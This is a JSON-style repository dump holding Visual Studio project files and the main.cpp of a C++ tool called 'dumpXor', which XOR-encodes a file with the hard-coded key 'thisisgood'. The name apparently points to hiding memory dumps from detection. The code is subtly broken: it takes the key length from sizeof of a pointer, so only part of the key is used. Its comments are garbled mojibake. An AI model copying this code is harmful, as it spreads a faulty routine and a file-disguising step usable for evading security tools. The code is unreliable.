Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <PropertyGroup Label=\"UserMacros\" />\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <FunctionLevelLinking>true</FunctionLevelLinking>\r\n      <IntrinsicFunctions>true</IntrinsicFunctions>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\r\n      <OptimizeReferences>true</OptimizeReferences>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <FunctionLevelLinking>true</FunctionLevelLinking>\r\n      <IntrinsicFunctions>true</IntrinsicFunctions>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>\r\n      <BufferSecurityCheck>false</BufferSecurityCheck>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\r\n      <OptimizeReferences>true</OptimizeReferences>\r\n      <GenerateDebugInformation>false</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemGroup>\r\n    <ClCompile Include=\"main.cpp\" />\r\n  </ItemGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\r\n  <ImportGroup Label=\"ExtensionTargets\">\r\n  </ImportGroup>\r\n</Project>"
  },
  {
    "path": "dumpXor/dumpXor/dumpXor.vcxproj.filters",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <ItemGroup>\r\n    <Filter Include=\"源文件\">\r\n      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>\r\n      <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>\r\n    </Filter>\r\n    <Filter Include=\"头文件\">\r\n      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>\r\n      <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>\r\n    </Filter>\r\n    <Filter Include=\"资源文件\">\r\n      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>\r\n      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>\r\n    </Filter>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClCompile Include=\"main.cpp\">\r\n      <Filter>源文件</Filter>\r\n    </ClCompile>\r\n  </ItemGroup>\r\n</Project>"
  },
  {
    "path": "dumpXor/dumpXor/dumpXor.vcxproj.user",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <PropertyGroup />\r\n</Project>"
  },
  {
    "path": "dumpXor/dumpXor/main.cpp",
    "content": "\r\n#include <stdio.h>\r\n\r\n\r\n\r\nint main(int argc, char* argv[]) {\r\n\r\n\r\n    int keylen, index = 0;\r\n    char* source, * dest, fBuffer[1], tBuffer[20], ckey;\r\n\r\n    FILE* fSource, * fDest;\r\n\r\n    source = argv[1]; // ԭļ\r\n    dest = argv[2];   // Ŀļ\r\n\r\n    char* key = (char*)\"thisisgood\";\r\n\r\n    // ȡkey\r\n    keylen = sizeof(key);\r\n\r\n    fSource = fopen(source, \"rb\");\r\n    fDest = fopen(dest, \"wb\");\r\n\r\n    while (!feof(fSource)) {\r\n\r\n        fread(fBuffer, 1, 1, fSource);    // ȡ1ֽ\r\n\r\n        if (!feof(fSource)) {\r\n            ckey = key[index % keylen];     // ѭȡkey\r\n            *fBuffer = *fBuffer ^ ckey;   // xor encrypt\r\n            fwrite(fBuffer, 1, 1, fDest); // дļ\r\n            index++;\r\n        }\r\n\r\n    }\r\n\r\n    fclose(fSource);\r\n    fclose(fDest);\r\n\r\n}"
  },
  {
    "path": "dumpXor/dumpXor.sln",
    "content": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 17\r\nVisualStudioVersion = 17.3.32825.248\r\nMinimumVisualStudioVersion = 10.0.40219.1\r\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"dumpXor\", \"dumpXor\\dumpXor.vcxproj\", \"{9CC63DB2-7FC6-4D54-A0E4-CD91E124BFD4}\"\r\nEndProject\r\nGlobal\r\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\r\n\t\tDebug|x64 = Debug|x64\r\n\t\tDebug|x86 = Debug|x86\r\n\t\tRelease|x64 = Release|x64\r\n\t\tRelease|x86 = Release|x86\r\n\tEndGlobalSection\r\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\r\n\t\t{9CC63DB2-7FC6-4D54-A0E4-CD91E124BFD4}.Debug|x64.ActiveCfg = Debug|x64\r\n\t\t{9CC63DB2-7FC6-4D54-A0E4-CD91E124BFD4}.Debug|x64.Build.0 = Debug|x64\r\n\t\t{9CC63DB2-7FC6-4D54-A0E4-CD91E124BFD4}.Debug|x86.ActiveCfg = Debug|Win32\r\n\t\t{9CC63DB2-7FC6-4D54-A0E4-CD91E124BFD4}.Debug|x86.Build.0 = Debug|Win32\r\n\t\t{9CC63DB2-7FC6-4D54-A0E4-CD91E124BFD4}.Release|x64.ActiveCfg = Release|x64\r\n\t\t{9CC63DB2-7FC6-4D54-A0E4-CD91E124BFD4}.Release|x64.Build.0 = Release|x64\r\n\t\t{9CC63DB2-7FC6-4D54-A0E4-CD91E124BFD4}.Release|x86.ActiveCfg = Release|Win32\r\n\t\t{9CC63DB2-7FC6-4D54-A0E4-CD91E124BFD4}.Release|x86.Build.0 = Release|Win32\r\n\tEndGlobalSection\r\n\tGlobalSection(SolutionProperties) = preSolution\r\n\t\tHideSolutionNode = FALSE\r\n\tEndGlobalSection\r\n\tGlobalSection(ExtensibilityGlobals) = postSolution\r\n\t\tSolutionGuid = {5CB8FD33-C656-4F9D-A594-3BF54C71E196}\r\n\tEndGlobalSection\r\nEndGlobal\r\n"
  }
]